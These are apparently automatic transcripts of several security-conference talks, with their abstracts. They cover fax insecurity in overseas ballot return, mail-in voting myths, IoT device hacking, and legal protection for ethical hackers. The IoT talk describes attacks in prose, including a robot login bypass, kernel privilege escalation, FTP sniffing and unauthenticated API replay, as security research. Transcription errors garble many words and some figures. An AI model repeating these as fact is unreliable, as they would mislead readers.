going to be 30, it's going to be unencrypted and it's not real time to 38 is the future that we're currently living in but we also need to see the future as far as encryption implementations. So we saw baby tell his company and they have an AS foundation. It's very useful for companies that are regulated and that are mandated to use. So it's not secure networks along the way towards the delivery to the user. However, this AS implementation by baby so isn't ensuring that you will have encrypted transport all the way across. So more stuff like that is what we need to see a default level and the street and we're not seeing right now which is why we're talking about it and getting that on the on the record. So the big issue we kind of based and push back from different cities and counties was that they say they only maybe the last facts about their seat just 2012 minutes eight years ago so they don't think about it at all doesn't cross their minds since they don't see on a daily basis and that's themselves. Why do we need to secure this doesn't seem like a security risk. But the point is, is that zero about me to be cashed for to be a security risk. The fact of the matter is that having your publicly available city or county clerk number online, and knowing and the most actors knowing that that's the phone number they need to have access to it's any that own that printer or print facts. That's all I need. And if you are not patched if you're on a potentially vulnerable solution. That's it you're done that print back is done you potentially yourself up for integrity tax the very the most confidentiality and availability. If you have a bad network solutions. So we face a lot of perspective but we definitely need to acknowledge that that's the issue is the root of matters having a publicly available fun. So we'll start with the security gap analysis is moving towards a future state. What we want to see, we'll like we talked about we want to see encryption, we want to, maybe even see a back so I wonder being a needed method for transmission. And many industries don't have that medical is 70% of all medical transitions. But maybe elections doesn't have to be one of those industries where taxes reality. So what are we going to do the future as we continue to work on this with security vote. Well we want to reconstruct the facts point but we also want to demonstrate with the T 38 tax protocol and tax of IP, because a lot of what we're seeing from cities and counties. We do do fact sometimes but it's all electronically and sometimes for the city be your county be scenarios IP just means security to them over the internet mean security, maybe they have some sort of bias against phone lines and not people and that's not the case. We want to demonstrate that exploits various election officials around the around the country and show back to secure and it can be changed or we need to make sure that this is your place to secure our votes and to secure democracy. So we're going to continue to raise awareness about back to security. And so what are we going to do now. Well, for one thing, COVID-19 has made this a very interesting age and potentially could drop voter turnout as people are cannot come up to physical voting locations, and maybe jurisdictions will look to things traditionally offered to the public and often that's the general public so facts the web portals and mobile voting. And we need to be very conscious when we look at adding facts to the general public, because that is adding a huge attack surface. And that's adding me, you know, the millions more votes that could potentially be cast by facts even though they, we probably won't see millions of votes cast by facts the potential is the point. And that potential millions of votes that could be changed or maliciously attacked. And that's a huge target for nation states maybe that are looking to influence it. So we need to keep that in mind as we potentially add facts and for more people. So if it does get added, we need to look at it very securely minded, and as an emergency ballot return method, not as something that everybody should think about, but as a security, you know, we're not going to be talking about anything else. So election office should probably secure the form security on the back machines to make sure you know, potentially if you were exactly what we've been talking about these HP printers that you bought after 2018 and it has a security patchplot all that stuff, because if it's not, that's the first step of the graph is first fixing the situation. So short term recommendations. If you're a position of power, you need to talk to your IT department about these things that we've been talking about. Specifically, you have security posture like multi factor, you have that already strong network network, across your IT department and you have a for your printer factors, you have a segment of not network to apologize about help you defend from these confidentiality and availability attacks that we've been talking about. And even the integrity attacks that will keep the current facts from exploiting the rest of your election network. And do you have a patching policy, you are even secure conscious about the network machines that you have in your office. And if you don't have these things or you don't know, I would definitely recommend talking to your IT department about this and try to secure your network by this fall. And in the further future, we need to talk about how the 38 tax of IP using encrypted solution should be the standard default and whatever one is using especially in the selections context. We also have vaccine for everyone so we're not storing on especially I've been on to the users on voter records on these specs machines and the 30 having an encryption protocol would also be great because a lot of people are still going to be stuck on legacy systems for various reasons. And so the encryption for that would be great as well. So the medical industry has actually had a little bit of a comms to or eliminated facts and simply do about 2020 for one of the main providers for back solutions for medical companies. It hasn't happened yet, you know, it's been crazy time, but they're definitely looking at your effects. So can we maybe eventually follow the medical industry. It's great questions and we're looking at the future. So what's the point of all this with all of 2020 is craziness laying down to the end of 2020. Everything that's happened this election is going to be of hands around importance, obviously, so we cannot let this opportunity to further secure America's democracy going spoken. That's all that we're about here the voting villages, showing exploits showing vulnerabilities and saying, we are not securing democracy properly if we really care. And that's one of those things, even though it's a few ballots, it's a few ballots and those few belts matter. So, at the same time, can we leverage you guys, can we say, if you guys have a fact machine if you're interested if you want to keep following us up. How about you have your facts machine, post about a hashtag hack facts, and we'll be able to see that and we'll be able to continue looking at that and showing that officials as we go about the country for the next few years with security with security though. So that's what we have. I have been killed gardener, run for a second, and we were the National Security Center, and that's a pack of bags. Thanks guys.
Millions of overseas voters must choose between the following ballot return methods: international mail, email or fax return as allowed by each respective state law. The insecurity of email and fax, arguably, creates a security gap in the overall elections infrastructure that undermines its integrity. The National Cybersecurity Center proposes to ‘hack a fax’ in order to demonstrate the lack of security, and create an opportunity to strengthen standards. The concern to the broader community is that as we continue to seek to make voting more accessible, it must also be secure. Policies that limit overseas voters to technology that may not have security standards in place, and therefore are insecure, reduces the integrity of the overall elections ecosystem.
10.5446/50770 (DOI)
Don't go postal over mail-in voting. A look into voting by mail with yours truly be a silo. First of all, who am I? I am a 13 year old girl and two years ago I was the youngest speaker at Hope and a lot has happened since then. I spoke three times at Defconn. I spoke in the Roots Asylum, the Biohacking Village and the Voting Village. I also gave a talk on election security in Romania at Defcamp, spreading the word about election security worldwide. My election hacking from the Roots Asylum was highlighted at a congressional hearing on election security and I am the founder and CEO of Girls Hack. Our motto is teaching girls the skills of hacking so that they can change the future. I provide online and physical lessons to any girl who wants to start her journey in cyber security. Speaking of my startups, I also started Secure Open Vote. I am building my own end-to-end election system. This year at Defconn I have my reporting system running in the Voting Village so you can try to change the vote count. So let's jump in. Due to COVID-19, this year's 2020 election is going to be one of the hardest in history. More people than ever are switching to mail-in voting instead of voting in person. To give you an idea of how many people voted in the 2016 elections by mail, 25% voted by mail. So let's clarify how voting by mail works, dispel some rumors, and go over the pros and cons. Starting with a quote from a high-level politician, there is no way, zero, that mail-in ballots will be anything less than substantially fraudulent. Mail boxes will be robbed, ballots will be forged, and even illegally printed out and fraudulently signed. Whoa, there is a lot to unpack there. First of all, he said that mail boxes will be robbed. First of all, this is a federal crime punishable by up to five years in jail and a quarter of a million dollars in fines. Stealing mail from someone's house to get their ballot would be difficult. You would have to know when the ballot was mailed out and everyone is home these days anyway. The postal mailboxes are emptied daily. So, unless you are going to go out in broad daylight, pick the lock to a mailbox and steal a bunch of mail-in ballots, pretty sure mail boxes are safe. If you did manage to get away with it, it is likely that the few ballots that you got will not tip the election. In May 2020, a big donor to the Trump campaign was appointed as Postmaster General. Since then, people have noticed that the mail has slowed significantly. Mail and packages have been returned. He has shut down the mail sorting machines forcing mail to be sorted by hand, taking the postal service back to the 1950s. Even one of my girls who hack soldering kits has come back to me. See? Anyway, but the good news is you can always drop off your ballot in a ballot drop-off box. In fact, over 65% of all mail-in ballots are cast this way. With everything going on in the mail system, your best bet is to drop your vote off at a ballot drop-off box or in person. But someone can just steal the entire ballot box. Not likely. Ballot boxes are kept at secure locations such as police stations or municipal buildings. The boxes are empty daily and have security cameras on them. Additional security features such as unique keyed locks or tamper-evident seals are also used. I know what you're thinking, but be a, in your other election talk, use a tamper-evident seals can be undetectably opened and manipulated. Okay, you do that. Go to the police station with your lockpicks and your acetone and open the ballot box. Let me know how that works out for you. The penalty for mail ballot fraud is up to five years in prison and $10,000 in fines for each act of fraud. That is in addition to state penalties. If the postal system and the ballot boxes still scare you, you can always drop off your ballot off by hand to the county clerk's or election board office. You may be saying that people are just going to print out their own ballots, but the ballots themselves are very difficult to forge. They use many security features, including special papers with UV sensitive markings and watermarks. You can't just run to staples and buy this stuff. If you have ever held a piece of fake money, you know how it feels different than the real thing. When the election officials are opening the ballots, the one that Bob printed out on his inkjet at home will definitely stick out. Some ballots use color shift ink or magnetic printing ink. This ink is extremely difficult to source and is delivered by armored truck. It's also worth noting that you need an actual printing press to use these inks. Bob won't just be loading that into his inkjet. Many ballots have micro printed unique security codes or barcodes. This prevents duplicates and allows voters to track their ballot as it travels through the system. Another thing that this high official said is they will forge signatures, but the voter signature is verified with their past signatures. Some states provide extra training for their election workers to spot forgeries. If an inconsistency is found, it is reported to the state prosecutor's office. But you can vote twice, once by mail and once in person. That's a big cup of nope! Mail in ballots are due before the election. This gives election officials time to check the voter off the roll as voted. If the voter goes and tries to vote in person, the state prosecutor's office is notified. Occasionally, people have received two ballots in the mail with their name on it. No, this does not mean you can vote twice. But how does this happen? Okay, how many of you have ever merged two databases? Well, the computer sees these two names as unique. Marge Boubier, the name she used when she first registered to vote at age 18, and Marge Boubier Simpson, the name she took after she got married to the handsome Homer Simpson and what is in the DMV system. When this state merged the DMV database with the voter registration database, Marge showed up twice. The good news is, humans check these names and signatures on the ballot to catch these kinds of errors. If you ever receive two ballots, simply call the election office and they can correct the error. Now that we've debunked some myths, let's talk about how voting by mail works. Every state is in charge of its own elections, so it differs slightly from state to state. Some states allow you to vote by mail without a specific reason. Others require a valid reason to vote by mail. A few do not consider COVID to be a valid reason, but this is changing day by day, so check vote.org to see what your state is doing. The first step is to register to vote. 39 states and the District of Columbia allow their citizens to register online. Every state has a printable registration form, so you can print it out in either mail it in or deliver it in person. Make sure that you register by the deadline. If it is getting close, bring that registration form to the clerk's office or election office in person. If you have not registered to vote, do it after this talk. I'm serious. It takes only two minutes, literally two minutes, and it's very important because every vote counts. I made this really big so you can take a screenshot, go to register dot vote dot org to register. Vote dot org has tons of great voter resources, including checking if you are registered, how to get a mail in ballot, and a polling place locator and election reminders. Next, make sure you're eligible to vote by mail. Currently, five states have an all mail in ballot election. 28 states and the District of Columbia have no excuse absentee voting, which means you can just vote by mail without having to give a specific reason. In 17 states, you need a valid reason. This differs from state to state. Some reasons include old age, being infirm or out of state. To see if you are eligible to vote by mail, go to vote dot org for your state and see if you are eligible. Here is a map and again, things are constantly changing, so check online at vote dot org to see where your state fits in. Next, you have to request an absentee ballot. If you have not done this, do it now. After my talk, go and request your absentee ballot. This will give them time to add you on the list and mail out your ballot. Guess what? You can do this at vote dot org. When you finally receive your ballot, sit down and fill it out. Right away. Don't put it in a pile of bills and junk mail you are ignoring. Sit down and just fill it out. One of the great things with mail and ballots is you can research the candidates. Get your OSINT on and find out what each candidate is all about. Who knows? Perhaps that school board member actually owns a chocolate factory. COVID is a valid reason for many to vote by mail and should be considered valid by all states. If a voter is immune compromised or lives with someone who is not allowing them to vote by mail, is a form of voter suppression. Voting in person also brings the risk of COVID to the election workers, many of which are elderly retirees. Putting their lives in danger just so you can vote in person. The poll workers also have to clean the machines between each vote, slowing the process and lengthening the poll lines. It also forces people to go to extremes to protect themselves. This lady had to wear a trash bag. Now that's one fashion statement that should never be made. In many states, processing of mail in ballots can begin as soon as they are received. Other states do this anywhere from one month to the day of the election. By permitting election officials to do a lot of the work ahead of time, the counting process on election day will be quicker. It's important to note that if ballots are counted ahead of time, their results are not released before election day. Regardless of how they are counted, this is a great opportunity to perform a risk limiting audit. And every state should do this. You have everything you need, handmark paper ballots and people to count them. But mail in voting has tons of fraud. Between 2000 and 2014, over a billion mail in ballots were cast and a professor at Laela School of Law found only 31 cases of fraud. There are many benefits to mail in voting. Voter turnout is 10% higher and it does not seem to be one party or another. It reduces some voter suppression like poll intimidation or people who have to travel a great distance to vote and have no transportation. Or people who have to work on election day, which should be a national holiday by the way. It also protects from attacks by foreign actors. Kind of hard to hack a piece of paper, isn't it, Putin? One of the biggest benefits is it speeds up the election process. No long lines at polls or people not being able to vote because of crashing e-poll books or slow election machines. The two most important things are it's a handmarked paper ballot and it allows for better informed voting. No more just randomly picking school board members. Remember this guy? The high ranking government official from earlier voted by mail in 2017, 18 and 20. I guess this system is good enough for him. So why shouldn't it be good enough for us? And remember, get involved, become a poll worker. See how the system works first hand and give those older tirees a break, especially during COVID. You can actually save a life by becoming a poll worker. Don't want to go outside and see people? I don't blame you. Not a problem. You can lend your cyber security knowledge and skills to those who need it most by becoming a cyber surge volunteer. This can be done by remote. You can do this by contacting this email or going to this site. Most important thing you can do is vote. Register to vote at vote.org and be counted. Thank you for listening to my talk. And don't forget to vote BSAB for president in 2044. This message paid for by BSILab for president 2044.
As the previous DEF CON Voting Villages have proved, our voting equipment and infrastructure are very vulnerable to multiple types of attacks. But now, with everything that’s going on in the world ,voting by mail is the new vulnerable thing! Instead of focusing on problems and broken things, this talk will focus on simple fixes that vendors and governments can put into action right now. Starting with the registering to vote, then moving through parts of the entire system, BiaSciLab will offer suggestions on how simple practices and changes in thinking can improve the security of the entire system. Last year, in the Voting Village BiaSciLab did a talk on the election systems problems and howto fix them. This year with voting by mail, new problems are appearing! Like States not allowing people to vote by mail! Breaking down these flaws and offering real solutions for each one, BiaSciLab will bring hope in the face of this daunting and complex security problem in these hard times.
10.5446/50720 (DOI)
Hi everyone, in this presentation we will tell you about our experiences about IoT hacking. I will also mention the weakness and misconfiguration that we have identified and can be detected. But firstly I want to talk about myself. When I look at myself in general, there are a few keywords I can use about me. These are co-founder, author, speaker and trainer. So apart from this, there is not much I can say for myself. And I can say I love WIFI hackers. This place also contains some information about my friends. Science we cannot make the presentation live and we are in different locations. I am the only one giving the presentation right now. Let's start guys. In IoT hacking research, there is something that everyone is serious about. How should IoT devices be analyzed? What is a methodology? What tools should I use in IoT hacking or research? Many many many questions like how can I find weakness in IoT devices? In order to answer these questions, we should be able to look deeply for understanding everything correctly. In this context, the first step is to choose the product to be analyzed. In order to do this, we should ask ourselves the following questions. Which industry am I targeting? Which area of the industry I target? For example, your target in the financial sector may be product used in banks. Your target in the health sector may be products used in patient rooms of hospitals. If you ask yourself this question and write down the answer, you will have defined your goal. After defining the target, the product must be supplied. There are several solutions for this. You can contact the manufacturer of the target product. You can contact the customer using the target product. You can buy the target product. By using one of these methods, you can contact the manufacturer, the developer or customer to improve security. This is the most important step because now your target industry and target area are certain. You also provided the product. To model this place correctly, we should know that every product has many properties associated with it. Not that these features associated with the product itself can actually be used as an attack point against the product. For this reason, you need to take a piece of paper in your hand and write the feature associated with the product. You can try it yourself for understanding attack surface mapping. Once you have correctly defined the attack points, you will need a necessary hardware and software to perform the associated attack. As you see, this resource you see in the presentation will be very, very, very helpful for this. You can find a lot of hardware and software in this resource. Finally, after all of them, you can start exploiting the product now. In this presentation, I would like to share the detail of three types and four products. The first is a robotic assistance. I can say about this target, the CEROBOT system, and it has target features such as Wi-Fi connection, internet connection, and USB inputs, and others. This target and product used in hospital, restaurant, airport, and in other possible area. On this product, we found weakness such as privilege escalation, hidden admin panel, big password, unsecured communication, and login bypass. Let's take a closer look at them and for understanding deeply. This is a login bypass in this target. Usually on the main screen, there are processes related to the service of the device. But remember, there was a keyboard input. When you press a fifth key combination with a keyboard attached here, you can bypass the service screen and access the terminal directly. After accessing the terminal with the previous weakness, we gathered information about the device with the unim-e command. Then we saw that there was a kernel weakness and we increased the authority on the system with the exploit. We don't know that from exploit DB. Another feature is the hidden admin panel in this product. Clicking on a particular area of the secret multiple times opens this secret. If it is also protected by a weak password, you can directly access it in admin authority. And yes, we did it. As my authority increased on the product, I started to try different things. And in an analysis, I saw that the product performed firmware and other software updates were insecure protocols like FTP. And you know, FTP is an insecure protocol. And if attacker there is an environment can sniff and can see username, password and others in the traffic. After all of them, I took control of the robots by catching the information of the server where the robots were updated. This is now a zombie robot network. We can do anything on the robots and we can control. This is a second story about the smart scooter. And I can say about this product. It's a visual user for transportation purpose. It has a feature that can be targeted such as smart lock, mobile application, developer and other and we will talk about it. And this smart scooter generally used in short distance for short distance transportation like campus of the university, you know. And I also saw some people use it to carry household items in Turkey. When we look at this product, we found that there are basically four different attack points. The most important of this attack point is of course the human factor and is ignorant in most research. Here is the mobile application. There are many functions that can be used as an attack vector in this mobile app and in general every electrical and smart scooter also saw the same function like reserve. But you can reserve your scooter, you can start ringing function and you can log in, register, you know. And this mobile application, it could be an APK file or API file, you know. And this is ringing function and at the same time you can light the device constantly so people around you understand that someone has found it first. In our study, we have seen that this function can only be triggered without authorization by the QR code number on this device. We can watch this video. And we captured mobile application traffic for ringing function and when it delays authorization header from the request, we saw we can repeat every time this function not limit and not anything for secure. And when I analyzed the mobile apps for two different products of the manufacturer, I saw that they use the same ISK value as hard code. And as you see in the presentation screen. Another weak point is again from within the mobile application hosting hard code information on mobile application is a common problem. Here I saw that the secret password information was left statically in mobile application. And when you analyze any mobile application related with the smart scooter, you can find this same bug in mobile application penetration testing related smart hardware. You should check some static information. You can find a lot of hard coded information like super password, ASKVIL. The main weakness here is the human and the devices that he uses. Therefore, we can expand the attack surface by asking the following question for the loop. Computer connected any Wi-Fi, connected any USB, opening every email and download file or run any file. Information system is updated. Mobile phone of the developer is jailbreak or root. After this question, we can launch a social engineering attack or hack the wireless network the person is using. In our research, we saw that there is a weakness here. The developer are very careless. And this is smart luck user luck and smart electrical scooter. It usually has a QR code on it and has low energy communication. It is also the main point as a site with the mobile application. The most danger point here is the QR code, which does not directly harm the smart scooter vehicle. But we have seen that it is an attack point for users in direct. Think like that. You can try to install malware on the phone with the fake QR code or redirect users to phishing page with the fake QR code on the smart scooter. And this story about the fifth smart luck, we want to tell you about it in no time. We can say about this target, this smart luck, it has started points such as mobile application, network service, internet connection, Bluetooth, low energy communication, firmware and hardware. All of them is attack vectors for us or our research. And this smart luck, it could be used in hospital home, in the smart scooter, and you know, in others. There are a lot of weakness here in the smart luck, especially if you are using cloud-based devices, using your home wireless network, you will lose communication with your smart device with the Wi-Fi dos attack. Another point is the wrong authorization made of the mobile application. So an attacker can control your locks. The weakness of the product is related to the web service that the mobile application communicate with. As you can see, there are many related points. And in the no-lock API, bind and unbind function is vulnerable related with broken authentication. Attacker can bind or unbind, can use bind and unbind function without any security restriction. Finally, we have seen that other users profile information can be updated without authorization in lock lock API. And thanks a lot of Rutschall labs for their support. Thank you for listening us.
Throughout this year, we had the chance to analyze two different models of electric scooters, three different models of smart locks, various kind of smart home devices and lastly one robot assistant which is in use at airports. During the analysis process, we have found some critical security vulnerabilities including privilege escalation, insecure communication and taking over the servers which these communications are being performed on. Additionally, we have identified two hard-coded secret keys and lastly one cryptographic key in the result of our analysis. In this presentation, we will be sharing the details of the vulnerabilities that we have identified during our analysis.
10.5446/50721 (DOI)
Thank you so much and hi everyone. Good morning. Good afternoon. Good evening wherever you are. I hope I got one of them right. So we're going to talk about how to get rights for hackers. And let's dive into it. Shall we? First things first. I want to just let you guys know that this talk is completely dedicated to all the hackers who've been scared to disclose. To all the hackers who've been prosecuted for trying to do something good and to all the people who are in the fight to bring rights for hackers. For those that don't know who I am, my name is Chloe, I am the VP strategy over a point for your security. And I'm not that I'm an ethical hacker advocate. I'm basically fighting for. Your rights and then also trying to do whatever I can to improve our hacker community. I'm the president and co founder of most like missions, women of security and the founder. We are hackers formally known as woman hackers. I'm also the podcast for ITSP magazine, the uncommon journey. And when I'm not doing that, I'm also a hacker book club organizer. Basically, we read a book about the hacker community or run by someone in the hacker community. And basically, we read a new book every month and it's every Tuesday at 5pm Pacific time when we meet. And yes, the author and people mentioned the books to attend. Our upcoming one is going to be tribe of hackers for a team addition. So you should come and join. That is my website. So feel free if you want to know anything about me. It's most likely on there. And yes, my Twitter and Instagram, the DMs are always open. So if you do have other questions or anything like that, you feel free to DM me at any time. So we're first going to dive into the current landscape. I know this is scary, but let's dive in it together. So first things first, equal facts. I would say usually raise your hand if the equal facts breach impacted you, but let's be real. Let's just pretend. Okay. But did you know a secure researcher warn ego effects that it was vulnerable to the kind of attack that later compromised the personal data more than 147 billion Americans. And this was reported by motherboard six months after the researcher first notified the company about the vulnerability equal facts past it. But only after the massive breach that made headlines had already taken place, according to equal facts on timeline. But the real question is, but what if no one reported the breach? And it happens often because hackers don't report a breach due to the fear of prosecution. This statistic was discovered by the hard work of meet Elzari who knows our laws prevent good hackers from doing what they do best protecting you and me and everyone we love. She has been spearheading this movement towards safe harbor and that is her at the corner. So why are hackers scared? Well, besides prosecution looking for contact information and reading the policies have been a burden to reporting vulnerabilities. Think about it. Sometimes when we find something we want to report, it can take hours, days, weeks. And then we get to a point like, what is, should I even keep trying at this point to try to find the right contact information? To disclose is a burden on you. This is why it's important to have like these vulnerability disclosure programs or bug bounty programs because at least you feel like you have some sort of protection and you know who to contact. You know the policies, you know, it's in scope. What's out of scope way ahead of the time. But I want to first dive into this case. So after DJI, the drone manufacturer recently launched a bug bounty program to researchers, Sean and Kevin. Basically, we're looking at their scope for the scope. The bug bounty program covers all the security issues and firmware application and servers, including source code week, security, work around privacy issues. Now, Kevin, he emailed them to confirm the scope to be safe. It took them two weeks to finally confirm the scope. He then reported the vulnerability and he was provided with $30,000 for the finding. However, the agreement of receiving it offered no legal protection for him. So he did what most people should be doing, which is he walked away. The revelations resulted in the company challenging the researchers findings and seemingly threatening one with a lawsuit tied to the computer fraud abuse act, also known as CFA. They claim that basically he went out of scope, regardless of the fact that he made sure to confirm the scope. In return, he posted the entire situation with all conversations with the DJI publicly. And if you see that link, you'll be able to see his blog to see what happened. I think one of the things, the best part that I read on there was there was this moment when DJI didn't know that when they respond to his email, there was an internal chain going on. Basically saying he's putting them at risk and they should do everything possible to prevent the risk, including losses and add PR for them. But this case, it did get dropped and they did get bad PR for this. But language and what is in scope and or out of scope when disclosing or how to disclose can be so scary and potential in documents, especially it could keep all parties awake at night. And I know it has done for me and I know that you probably do. But program managers overall, they're always asking to be hacked, but not hack valley and how to conduct handle situations and researchers report something is something that they need to work on too as well. But overall organizations and governments all know it's probably needed at this time, as you can see on this slide. And I know once again, this is a scary subject and we're going to keep getting into the more scary, scary parts of the subject. But here are some puppies to lift your spirits. And yes, there is a picture for the cat lovers as well. So if you see the cat Bravo. And no, sure, like I'm going to is not on here. All right. So why are they scared? Let's dive into this a little bit more. Even though ethical hackers are not malicious actors, they're still being seen and treated as such by the public. And because of this, it reduces the chance of reporting a vulnerability and can cause hackers to go to the dark side because they're seen as the same by the public. To the left is what you see when typing in criminal hackers and to the right is ethical hackers. Once again, there's this dark hoodie darkness sometimes with a ski mask. But I want to also point out that it's not just the imagery. It's also the language used in the media seen as in marketing and press anytime I say media, it's marketing and press and marketing could be even for infoset companies. You find this often using the term hacker as someone who is seen as a criminal is incorrect. They should be using the term attacker cyber criminal, malicious actor and so on. Unless they're reporting something good about us, then they can definitely do a hacker thing. So probably wondering how does this imagery and language impact us? It continues to feed the fear and stereotypes, the biases that exist through social construction. And of course, if you have attended any of my talks before, I am obsessed with the brain. So we're going to talk about the brain today. So what is really important is to understand how fear works in your brain. So first of all, I want you to take a look at this. So fear is usually based around your migra, which is like this almond shaped and it's a size of an almond, believe it or not, inside your brain within the temporal lo. It is the part where your emotions are attached to memories. So for example, if you have a nightmare, you're going to recall it a little bit more because a strong emotion was attached to it. Versus if it's just a regular dream, you might not remember it, but you will always remember a dream where it is extremely happy or extremely scary. So think of that. Anyway, the thing that you might know about the main goal is usually the fight versus flight mechanism. And what I really want to explain is fight versus flight mechanism is a great way to showcase what the main goal is. But it also is this part of you that's subconscious and it decides what's like you who's not like you. And based on that belief itself, you put people into categories of people to trust people not to trust. And so, for example, the miktilai because it's stored in your memory section of your brain. It's also dictating subconsciously whatever socially constructed beliefs that you've had. And if you're wondering, what is a socially constructed belief? It's just anytime when you were growing up or you had a teacher tell you that this is unsafe, your parents tell you that's not safe or like anything that you've seen in movies, TV, indirectly, it's letting you know some memory for you to hold onto. Now, I want to give you kind of a better example here. So I always tell people, think about this way. You were growing up and you watched a bunch of movies as a kid and every time someone had pink hair, they were the criminal, the villain in it. And not just that, but also you see on the news, people with pink hair are dangerous individuals or committing all the crimes. You read in textbooks, you read from teachers, letters, you read everything, just showcasing that people pink hair are dangerous. So when you see someone with pink hair at this point, you will probably clutch your bag a little bit closer or you might cross the street or you might actually lock your car doors when you see someone with pink hair. And I know that sounds like, but the person just has pink hair. The thing is that you have been led to believe that someone with pink hair is someone dangerous. And that's a socially constructed belief and then make a lot will always act on socially constructed beliefs when it comes to survival. So if it's known that someone pink hair is dangerous, thus you will react in the same way. So the good news though is that it has to verify. So the prefrontal cortex acts kind of like the CEO in the brain. So this is completely conscious now. So what happens is the regular sense of message saying warning someone pink hair is right behind you. And then your prefrontal cortex thinks, okay, I can either cross the street or I can go into a building or I can clutch my bag a little bit closer or I can look behind me to be on top of everything possibly, or I just ignore the threat. So the prefrontal cortex, then you decide which action to take and it sends a message back to the make the law to act on that action. But the one thing to note about is that you are completely conscious about it and you're making that decision. But the good news is that there's still this validation. So people's biases, socially constructed beliefs or whatnot can always be challenged. And the best way how to do it that is through stories, hearing people's personal stories. So for example, in the same pink hair situation, if the person with pink hair made a YouTube video talking about how it's so terrible for them because every time someone sees them, they see them as a criminal and how that prevents them getting a job, how that prevents them getting where they need to go, how, for example, cops are called on them just for being outside. And how society as a whole isn't doing enough to understand that it's just because the person has pink hair. There's nothing else than that. So now if you put in a lens of a hacker, you probably have experienced once or twice, where when you tell someone you're a hacker or you work in the hacker community. The next thing you know is that they take a step back or the mouth drops or their eyes get bigger. They just get afraid because the thing is, is that our world has been socially constructed to see hackers as criminals as a blanket for all hackers. And instead of thinking them as not just hackers, there's a difference between a hacker and an attacker because they haven't learned that yet. And because our personal stories are not really out there yet either. And that's the problem. So what happens is, is for the hacker situation is that because of the mindset set by society by people in the media that's keeping us unsafe and preventing hackers, what they do well in companies are afraid of hackers and don't want to create vulnerability disclosure policies because of the lack of a bilateral trust amongst hackers and organizations and government. It's one of the reasons why 60% do not report vulnerabilities. Hackers are scared of outdated laws such as CFA and DMCA. Also from interviewing attackers, one of the reasons they decided to move away from ethical hacking is the pay and the constant worrying of being prosecuted regardless of the did something legal. This is stated also similarly by those who switch from being an attacker to a hacker. The reason they switched was the insomnia of being arrested because there are cases when organizations prosecute ethical hackers regardless if they were in scope. So, which leads us to needing to dive into the current legislation that can be found in most countries towards hackers. And this is worldwide legislation. Okay, so every country around the world has anti hacking laws anti circumvention laws, also known as copyright type of laws and accessible use policy. So let's first dive into the computer fraud abuse act and every country has their own, but the US is the first one. I think you put it first. So let's dive into that one. The computer fraud abuse act in the US cybersecurity bill that was enacted in 1984 as an amendment to existing computer fraud law, which has been included in the comprehensive crime control act of 1984. The law prohibits accessing a computer without authorization or in excess of authorization. Also, we use when a researcher tends to go out of scope. This act is used to prosecute hacking. Random fact, who here has heard of war games? Okay. Did you know that Ronald Reagan, he watched it and freaked out about hackers and he's like, we gotta do something. So he pushed for CFA to happen. Now let's dive into anti circumvention laws. So the copyright laws. So, okay, you have the copyright law. Well, you're not super easy, but in the US, we have the DMCA, the digital millennium copyright act. And it was enacted in 1998. The US copyright law that implements to 1996 treaties, the World Intellectual Property Organization, WIPO. Basically, it's the right to repair reverse engineering is seen as a breach of property. Let's dive into that stuff. We'll use policy. Now, who here has ever read their terms and conditions say, for example, an Apple product. So I got, I tried it. I got really bored and I decided to watch a movie instead. But in general, they could be long and too much verbiage. It can confuse anyone, especially English is not their first language. And you're not an attorney. I'm not an attorney, by the way. But the thing is, is that this can lead to some serious miscommunication issues for ethical hackers that don't really speak English. Clearly, these laws overall take away is they're old and out of date. And honestly, they were created out of fear. And you know now about fear. By not having empathy or taking the time to understand what is actually needed and why law should only prosecute malicious actors, aka criminals and not good hackers. Because at the time, it's still to this day, a lot of legislators and politicians still don't know that hackers are good people. There's a difference between a malicious actor and attacker, a cyber criminal and a hacker. Overall take away from here is that there are laws that prevent good hacking in the same way that they prevent attackers. And we need good hacking, especially during COVID-19, you guys. And I really hate the CFA and I want to dive a little bit further into it just for you to know in case you don't know. So the computer produce act once again was passed in 1984 is grown at widely outdated and that it offers prosecutors discretion to threaten huge potential fines and jail sentences for relatively undeserving violations of computer policy. First, the CFA was written punishes exceeding authorized access to a protected computer, a phrase, vegan after inspire some broad interpretations. Another flaw in the CFA is the redundant provisions that enable a person to be punished multiple times for the same crime. These crimes can be stacked one on top of another, resulting in a threat of a higher cumulative fines and jail time for the exact same violation. This also allows prosecutors to bully defendants into accepting a deal in order to avoid facing a multitude of charges from a single solitary act. It also plays a significant role in sentencing this ambiguity of provision meant to tough and sentencing for repeat offenders. The CFA may in fact make it possible for defendants to be sentenced based on what should be prior convictions, but we're nothing more than multiple convictions for the same crime. And this is why it's now important for us to talk about Aaron Schwartz case. For those that do not know Aaron Schwartz case, it basically started off in 2011. Carmen Ortiz, the U.S. Attorney Office charged Schwartz with hacking into the MIT computer network to download millions of scholarly articles from JSTOR. An act of civil disobedience meant to protest the restricted access to research funded by taxpayers. For this, the U.S. Attorney brought charges that carried a maximum penalty of 35 years in prison and $1 million in fine. I want to pause there because think about that. 35 years in prison for downloading articles. You know, first degree murder, life, in prison, no. It's actually in 25 years. And yet he was facing 35. Going back to this, they were able to charge such years because of the way CFA is written and the issues that have yet to be sorted since it was made into a law. But overall looking at Aaron's situation, you have to understand what he was going through. He was dealing with a 17 month legal battle, one that had no set trial date and wasn't ending any time soon. And through Schwartz's perspective, it must have been so overwhelming. And it was the future of this legal battle that cast into doubt that Schwartz, unfortunately, he hung himself in his apartment on January 11, 2013. And following his death, the federal prosecutors went on to drop the charges. His family said that the government's prosecution contributed to his decision to take his own life. In memory and for what he went through, unfortunately, there was Aaron's law. It didn't pass because a probably lobbyist, very heavy corporate lobbyist didn't want it to pass. But what Aaron law removes the phrase exceeds authorized access and replaces it with access with authorization, which is defined as to obtain information on a computer that the accessory lacks authorization to obtain by no only circumventing technological or physical measures designed to prevent unauthorized individuals from obtaining that information. The other thing is that it would ensure people won't face criminal liability for violating the terms of service agreement and contracted agreements. But also limits penalties. In other words, there was no more duplicated charges. So no more stack on stack what Aaron went through. And with improvements to legislation, so to CFA, DMCA with these changes, then we can have what we need today. And that is we need to also talk about the other parts. So not only legislation, so we call legislation, we talked about the media, the press and whatnot. We also talked about organizations needing vulnerability disclosure programs. And I want to dive into those three categories a little bit more because in order to have any rights or to get any public change, we have to work with three categories. So in order to have rights for hackers, we need to get the public on board. And in order to do so, we need to dive into organizations, legislation and media. We need media to push for public to become aware. In other words, we need to change the language and imagery of a hacker and start using the term cyber criminals for those who commit unethical hacking over really separate the two groups. In order to help the press organizations need to be on board with bilateral trust with having vulnerability disclosure programs by showing they support hackers, the public changes their view in general. And lastly, to have organizations and 